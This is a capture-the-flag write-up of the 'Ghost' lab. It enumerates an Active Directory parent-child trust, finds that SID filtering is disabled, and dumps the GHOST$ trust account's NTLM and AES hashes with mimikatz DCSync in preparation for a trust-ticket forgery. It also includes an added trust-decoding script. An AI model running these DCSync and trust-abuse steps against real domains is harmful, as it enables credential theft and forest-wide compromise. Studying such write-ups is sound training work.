corp.ghost.htb


Upon compromising the PRIMARY host, I was still confused, as I couldn't figure out how the PRIMARY host fits into the target organization.

Neither the ldapdomaindump nor the BloodHound enumeration showed a host named PRIMARY in the GHOST.HTB domain.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ echo -e '[realms]\n\n\tGHOST.HTB = {\n\t\tkdc = dc01.ghost.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
 
	GHOST.HTB = {
		kdc = dc01.ghost.htb
	}
 
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get dnsDump --no-detail
 
recordName: dc01.ghost.htb
A: 10.10.11.24; 10.0.0.254
 
recordName: 474f28d4-2ee2-4265-91ed-1a724db27810._msdcs.ghost.htb
CNAME: primary.corp.ghost.htb
 
recordName: 513ce2e2-b58a-4774-8262-db6ba61d5b8a._msdcs.ghost.htb
CNAME: dc01.ghost.htb
 
recordName: core.ghost.htb
type: ACCESS DENIED
 
recordName: intranet.ghost.htb
type: ACCESS DENIED
 
recordName: gitea.ghost.htb
type: ACCESS DENIED
 
recordName: PRIMARY.corp.ghost.htb
type: ACCESS DENIED
 
recordName: corp.ghost.htb
type: ACCESS DENIED
 
recordName: federation.ghost.htb
type: ACCESS DENIED
 
recordName: core.ghost.htb
type: ACCESS DENIED
 
recordName: intranet.ghost.htb
type: ACCESS DENIED
 
recordName: gitea.ghost.htb
type: ACCESS DENIED
 
recordName: PRIMARY.corp.ghost.htb
type: ACCESS DENIED
 
recordName: corp.ghost.htb
type: ACCESS DENIED
 
recordName: federation.ghost.htb
type: ACCESS DENIED

Looking further into the DNS records, the PRIMARY.corp.ghost.htb record suggests that the PRIMARY host belongs to the CORP.GHOST.HTB domain, which is trusted by the GHOST.HTB domain.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get children DC=GHOST,DC=HTB | grep -i corp.ghost.htb
distinguishedName: CN=corp.ghost.htb,CN=System,DC=ghost,DC=htb

Interestingly, corp.ghost.htb sits under CN=System,DC=ghost,DC=htb, which is where Active Directory keeps its trustedDomain objects.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get object CN=corp.ghost.htb,CN=System,DC=ghost,DC=htb --resolve-sd
 
distinguishedName: CN=corp.ghost.htb,CN=System,DC=ghost,DC=htb
cn: corp.ghost.htb
dSCorePropagationData: 1601-01-01 00:00:00+00:00
flatName: GHOST-CORP
instanceType: 4
isCriticalSystemObject: True
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: Domain Admins
nTSecurityDescriptor.ACL.0.Right: WRITE_PROP
nTSecurityDescriptor.ACL.0.ObjectType: 736e4812-af31-11d2-b7df-00805f48caeb
nTSecurityDescriptor.ACL.0.InheritedObjectType: Trusted-Domain
nTSecurityDescriptor.ACL.1.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.1.Trustee: Domain Admins
nTSecurityDescriptor.ACL.1.Right: DELETE
nTSecurityDescriptor.ACL.1.ObjectType: Self
nTSecurityDescriptor.ACL.2.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.2.Trustee: Domain Admins; LOCAL_SYSTEM
nTSecurityDescriptor.ACL.2.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.2.ObjectType: Self
nTSecurityDescriptor.ACL.3.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.3.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.3.Right: GENERIC_READ
nTSecurityDescriptor.ACL.3.ObjectType: Self
nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.4.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.4.Right: READ_PROP
nTSecurityDescriptor.ACL.4.ObjectType: General-Information; Logon-Information; Group-Membership; Remote-Access-Information; Account-Restrictions
nTSecurityDescriptor.ACL.4.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.4.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.5.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.5.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.5.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: CREATOR_OWNER; PRINCIPAL_SELF
nTSecurityDescriptor.ACL.6.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.6.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.6.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.6.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.7.Right: READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.7.InheritedObjectType: Computer; User; Group
nTSecurityDescriptor.ACL.7.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.8.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.8.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.8.Right: WRITE_PROP
nTSecurityDescriptor.ACL.8.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.8.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.8.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.9.Right: GENERIC_READ
nTSecurityDescriptor.ACL.9.ObjectType: Self
nTSecurityDescriptor.ACL.9.InheritedObjectType: User; Group; inetOrgPerson
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.10.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.10.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.11.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.11.ObjectType: Private-Information
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.12.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.12.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.12.ObjectType: Self
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.13.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.13.Right: LIST_CHILD
nTSecurityDescriptor.ACL.13.ObjectType: Self
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.14.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.14.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.14.ObjectType: Self
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED
name: corp.ghost.htb
objectCategory: CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=ghost,DC=htb
objectClass: top; leaf; trustedDomain
objectGUID: {6a8048b9-26d0-4056-acfe-4cbc25545be2}
securityIdentifier: AQQAAAAAAAUVAAAAfWNAeX6j8KLyH7kK
showInAdvancedViewOnly: True
trustAttributes: 32
trustDirection: 3
trustPartner: corp.ghost.htb
trustPosixOffset: -2147483648
trustType: 2
uSNChanged: 49194
uSNCreated: 16495
whenChanged: 2024-06-18 15:55:05+00:00
whenCreated: 2024-02-01 02:33:33+00:00

CORP.GHOST.HTB appears to be a child domain of GHOST.HTB. The trustAttributes value of 32 (0x20) is TRUST_ATTRIBUTE_WITHIN_FOREST, i.e. a trust between two domains of the same forest.

The trustDirection attribute is set to 3, which according to the official Microsoft documentation means the trust is bidirectional.

The trustType attribute is set to 2, which is TRUST_TYPE_UPLEVEL (the trusted domain is a Windows Active Directory domain).

PS C:\> whoami
nt authority\system
PS C:\> hostname
PRIMARY
 
PS C:\> Get-ADTrust -Filter *
Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=ghost.htb,CN=System,DC=corp,DC=ghost,DC=htb
ForestTransitive        : False
IntraForest             : True
IsTreeParent            : False
IsTreeRoot              : False
Name                    : ghost.htb
ObjectClass             : trustedDomain
ObjectGUID              : b0c64079-6f51-4516-9a62-90f94666bfc1
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=corp,DC=ghost,DC=htb
Target                  : ghost.htb
TGTDelegation           : False
TrustAttributes         : 32
TrustedPolicy           : 
TrustingPolicy          : 
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

This is confirmed by checking the trust from the PRIMARY host with the Get-ADTrust PowerShell cmdlet: Direction is BiDirectional, IntraForest is True and TrustType is Uplevel.

PS C:\tmp> cmd /c netdom.exe trust CORP.GHOST.HTB /domain:GHOST.HTB /quarantine
 
SID filtering is not enabled for this trust. All SIDs presented in an
authentication request from this domain will be honored.
 
The command completed successfully.

SID filtering is NOT enabled for the trust. If a user is migrated from one forest to another and SID Filtering is not enabled, it becomes possible to add a SID from the other forest, and this SID will be added to the user's token when authenticating across the trust.

This also means the parent-child trust relationship between CORP.GHOST.HTB and GHOST.HTB can be abused by forging a golden ticket for the trust.

But that requires a trust account

GHOST$


PS C:\tmp> Get-ADUser -Identity GHOST$ -Properties *
AccountExpirationDate                : 
accountExpires                       : 9223372036854775807
AccountLockoutTime                   : 
AccountNotDelegated                  : False
AllowReversiblePasswordEncryption    : False
AuthenticationPolicy                 : {}
AuthenticationPolicySilo             : {}
BadLogonCount                        : 0
badPasswordTime                      : 0
badPwdCount                          : 0
CannotChangePassword                 : False
CanonicalName                        : corp.ghost.htb/Users/GHOST$
Certificates                         : {}
City                                 : 
CN                                   : GHOST$
codePage                             : 0
Company                              : 
CompoundIdentitySupported            : {}
Country                              : 
countryCode                          : 0
Created                              : 1/31/2024 10:38:33 AM
createTimeStamp                      : 1/31/2024 10:38:33 AM
Deleted                              : 
Department                           : 
Description                          : 
DisplayName                          : 
DistinguishedName                    : CN=GHOST$,CN=Users,DC=corp,DC=ghost,DC=htb
Division                             : 
DoesNotRequirePreAuth                : False
dSCorePropagationData                : {12/31/1600 4:00:00 PM}
EmailAddress                         : 
EmployeeID                           : 
EmployeeNumber                       : 
Enabled                              : True
Fax                                  : 
GivenName                            : 
HomeDirectory                        : 
HomedirRequired                      : False
HomeDrive                            : 
HomePage                             : 
HomePhone                            : 
Initials                             : 
instanceType                         : 4
isCriticalSystemObject               : True
isDeleted                            : 
KerberosEncryptionType               : {}
LastBadPasswordAttempt               : 
LastKnownParent                      : 
lastLogoff                           : 0
lastLogon                            : 0
LastLogonDate                        : 
LockedOut                            : False
logonCount                           : 0
LogonWorkstations                    : 
Manager                              : 
MemberOf                             : {}
MNSLogonAccount                      : False
MobilePhone                          : 
Modified                             : 6/18/2024 8:55:06 AM
modifyTimeStamp                      : 6/18/2024 8:55:06 AM
msDS-User-Account-Control-Computed   : 0
Name                                 : GHOST$
nTSecurityDescriptor                 : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                       : CN=Person,CN=Schema,CN=Configuration,DC=ghost,DC=htb
ObjectClass                          : user
ObjectGUID                           : 6a5c624b-27e1-4e81-8e84-e0c7fc05657f
objectSid                            : S-1-5-21-2034262909-2733679486-179904498-1103
Office                               : 
OfficePhone                          : 
Organization                         : 
OtherName                            : 
PasswordExpired                      : False
PasswordLastSet                      : 6/18/2024 8:55:06 AM
PasswordNeverExpires                 : False
PasswordNotRequired                  : True
POBox                                : 
PostalCode                           : 
PrimaryGroup                         : CN=Domain Users,CN=Users,DC=corp,DC=ghost,DC=htb
primaryGroupID                       : 513
PrincipalsAllowedToDelegateToAccount : {}
ProfilePath                          : 
ProtectedFromAccidentalDeletion      : False
pwdLastSet                           : 133631997063280882
SamAccountName                       : GHOST$
sAMAccountType                       : 805306370
ScriptPath                           : 
sDRightsEffective                    : 15
ServicePrincipalNames                : {}
SID                                  : S-1-5-21-2034262909-2733679486-179904498-1103
SIDHistory                           : {}
SmartcardLogonRequired               : False
State                                : 
StreetAddress                        : 
Surname                              : 
Title                                : 
TrustedForDelegation                 : False
TrustedToAuthForDelegation           : False
UseDESKeyOnly                        : False
userAccountControl                   : 2080
userCertificate                      : {}
UserPrincipalName                    : 
uSNChanged                           : 20517
uSNCreated                           : 12890
whenChanged                          : 6/18/2024 8:55:06 AM
whenCreated                          : 1/31/2024 10:38:33 AM

The GHOST$ account is a user object despite the trailing $ sign, and that is what makes it special: GHOST$ is the inter-domain trust account that represents the trust with GHOST.HTB inside the forest.

INTERDOMAIN_TRUST_ACCOUNT


The answer lies in the userAccountControl attribute, whose value is 2080 (0x820).

According to the official Microsoft documentation, 0x0800 (2048 in decimal) is the INTERDOMAIN_TRUST_ACCOUNT flag. The remaining 0x20 (32) is PASSWD_NOTREQD, which matches the PasswordNotRequired value of True in the Get-ADUser output above.
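As an added example (not part of the original writeup), the following decoder reads the values shown above the way an auditor reviewing trusts would: it decodes the trustedDomain attributes (trustDirection 3, trustType 2, trustAttributes 32), converts the base64 securityIdentifier blob of the corp.ghost.htb trust object into a SID string, decodes the GHOST$ userAccountControl value 2080, and checks that the GHOST$ SID falls under the decoded trusted-domain SID. The flag tables follow MS-ADTS; the input values are copied from the output on this page.

```python
import base64
import struct

# Values copied from the bloodyAD and Get-ADUser output above; the base64 blob is
# the securityIdentifier attribute of the corp.ghost.htb trustedDomain object.
TRUST_SID_B64 = "AQQAAAAAAAUVAAAAfWNAeX6j8KLyH7kK"
GHOST_TRUST_ACCOUNT_SID = "S-1-5-21-2034262909-2733679486-179904498-1103"

# Flag names per MS-ADTS; only the bits relevant to trust auditing are listed.
TRUST_DIRECTION = {0: "DISABLED", 1: "INBOUND", 2: "OUTBOUND", 3: "BIDIRECTIONAL"}
TRUST_TYPE = {1: "DOWNLEVEL", 2: "UPLEVEL", 3: "MIT", 4: "DCE"}
TRUST_ATTRIBUTES = {
    0x1: "NON_TRANSITIVE", 0x2: "UPLEVEL_ONLY", 0x4: "QUARANTINED_DOMAIN",
    0x8: "FOREST_TRANSITIVE", 0x10: "CROSS_ORGANIZATION", 0x20: "WITHIN_FOREST",
    0x40: "TREAT_AS_EXTERNAL", 0x80: "USES_RC4_ENCRYPTION",
}
UAC_FLAGS = {
    0x2: "ACCOUNTDISABLE", 0x20: "PASSWD_NOTREQD", 0x200: "NORMAL_ACCOUNT",
    0x800: "INTERDOMAIN_TRUST_ACCOUNT", 0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD",
}

def decode_flags(value, table):
    """Names of the bits set in value, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]

def sid_from_bytes(raw):
    """Binary SID: revision, sub-authority count, 48-bit BE authority, LE sub-authorities."""
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, raw, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def sid_in_domain(account_sid, domain_sid):
    """True if account_sid is domain_sid followed by a single RID."""
    return account_sid.rsplit("-", 1)[0] == domain_sid

def summarize_trust(direction, trust_type, attributes, sid_b64):
    """Decode one trustedDomain object the way an auditor reads it."""
    attrs = decode_flags(attributes, TRUST_ATTRIBUTES)
    return {
        "direction": TRUST_DIRECTION.get(direction, "UNKNOWN"),
        "type": TRUST_TYPE.get(trust_type, "UNKNOWN"),
        "attributes": attrs,
        "trusted_domain_sid": sid_from_bytes(base64.b64decode(sid_b64)),
        # QUARANTINED_DOMAIN is the bit netdom /quarantine sets; it is absent here,
        # matching the "SID filtering is not enabled" output above.
        "sid_filtering": "QUARANTINED_DOMAIN" in attrs,
    }

if __name__ == "__main__":
    trust = summarize_trust(3, 2, 32, TRUST_SID_B64)       # attribute values from the page
    print(trust)
    print(decode_flags(2080, UAC_FLAGS))                   # GHOST$ userAccountControl
    print(sid_in_domain(GHOST_TRUST_ACCOUNT_SID, trust["trusted_domain_sid"]))
```

The decoded securityIdentifier is the domain SID of CORP.GHOST.HTB, and the GHOST$ objectSid above is exactly that SID plus RID 1103, so the trust object on DC01 and the trust account on PRIMARY describe the same relationship from both sides.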

hashdump


mimikatz # lsadump::dcsync /user:GHOST$
[DC] 'corp.ghost.htb' will be the domain
[DC] 'PRIMARY.corp.ghost.htb' will be the DC server
[DC] 'GHOST$' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
 
Object RDN           : GHOST$
 
** SAM ACCOUNT **
 
SAM Username         : GHOST$
Account Type         : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration   : 
Password last change : 6/18/2024 8:55:06 AM
Object Security ID   : S-1-5-21-2034262909-2733679486-179904498-1103
Object Relative ID   : 1103
 
Credentials:
  Hash NTLM: dae1ad83e2af14a379017f244a2f5297
    ntlm- 0: dae1ad83e2af14a379017f244a2f5297
    ntlm- 1: 2636885e5b7ee03e66fac8a567a14cb8
    ntlm- 2: 2636885e5b7ee03e66fac8a567a14cb8
    lm  - 0: c8a823036bf239d95c1d166305f8e79a
    lm  - 1: dd2679126cbff3074d6ac55b46bcff8e
 
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : CORP.GHOST.HTBkrbtgtGHOST
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 3db833a897310f160ef3e277be7a6b9236637455a33c5af4c73ded94203d7c0b
      aes128_hmac       (4096) : da9ac6706a5f1b240782fc36ed028917
      des_cbc_md5       (4096) : 620d527c97fba726
    OldCredentials
      aes256_hmac       (4096) : d2ab719f9ad073f12da25e8e2799486be50f8c19e725f40e76d04f8fa428c5c5
      aes128_hmac       (4096) : c225eaa67fceec20f2457ac5649fc9d2
      des_cbc_md5       (4096) : 83dae62551a26ea1
    OlderCredentials
      aes256_hmac       (4096) : d2ab719f9ad073f12da25e8e2799486be50f8c19e725f40e76d04f8fa428c5c5
      aes128_hmac       (4096) : c225eaa67fceec20f2457ac5649fc9d2
      des_cbc_md5       (4096) : 83dae62551a26ea1
 
* Primary:Kerberos *
    Default Salt : CORP.GHOST.HTBkrbtgtGHOST
    Credentials
      des_cbc_md5       : 620d527c97fba726
    OldCredentials
      des_cbc_md5       : 83dae62551a26ea1
 
* Packages *
    NTLM-Strong-NTOWF
 
* Primary:WDigest *
    01  a690b95aa54d9f0b8949f8ebc989fa22
    02  bc481affbee64de7871fc26e840c8d3f
    03  a690b95aa54d9f0b8949f8ebc989fa22
    04  a690b95aa54d9f0b8949f8ebc989fa22
    05  357d82c56fcba97537a80b6b1646a303
    06  357d82c56fcba97537a80b6b1646a303
    07  b81618223d10540b14a79cef6077524c
    08  c083ba2f1fdc6babde6ecd22e59e00d3
    09  7726dea11b36e67b7010272f04387b02
    10  652f3cca8209ce595b1d0acfe72d33f5
    11  652f3cca8209ce595b1d0acfe72d33f5
    12  c083ba2f1fdc6babde6ecd22e59e00d3
    13  c083ba2f1fdc6babde6ecd22e59e00d3
    14  a1d295f5ce6081b8a4426fa3b465f3b4
    15  6ea9bcc718cc977cf096cdf1ce398d17
    16  7ea9477ed24b4aeefe912e138f774a1d
    17  162db51d0b81a2b3e2b1186cfa57e78e
    18  6e1327fbed9281d78b3880b8e782e31c
    19  1ce7901a529ea401146cdde02480ef23
    20  6e1327fbed9281d78b3880b8e782e31c
    21  7c67fb9ecb18de05a4d42c9855778aef
    22  7617a933b0792a05b747e913fe368af4
    23  7c67fb9ecb18de05a4d42c9855778aef
    24  c1da681b912f7491da8a75d1578fbd3c
    25  0e81343b14c663f3985a71d9473ed97e
    26  cfa0f06f77c9635a15f90aeae48d2d89
    27  4449558fad37c76d617ff42d068fe9dd
    28  5aba2cebe9e42845d1aa88089a5afe21
    29  4449558fad37c76d617ff42d068fe9dd

It is indeed a trust account: the User Account Control value 00000820 decodes to PASSWD_NOTREQD and INTERDOMAIN_TRUST_ACCOUNT, and the account type is TRUST_ACCOUNT.

  • NTLM: dae1ad83e2af14a379017f244a2f5297
  • aes256_hmac: 3db833a897310f160ef3e277be7a6b9236637455a33c5af4c73ded94203d7c0b
  • aes128_hmac: da9ac6706a5f1b240782fc36ed028917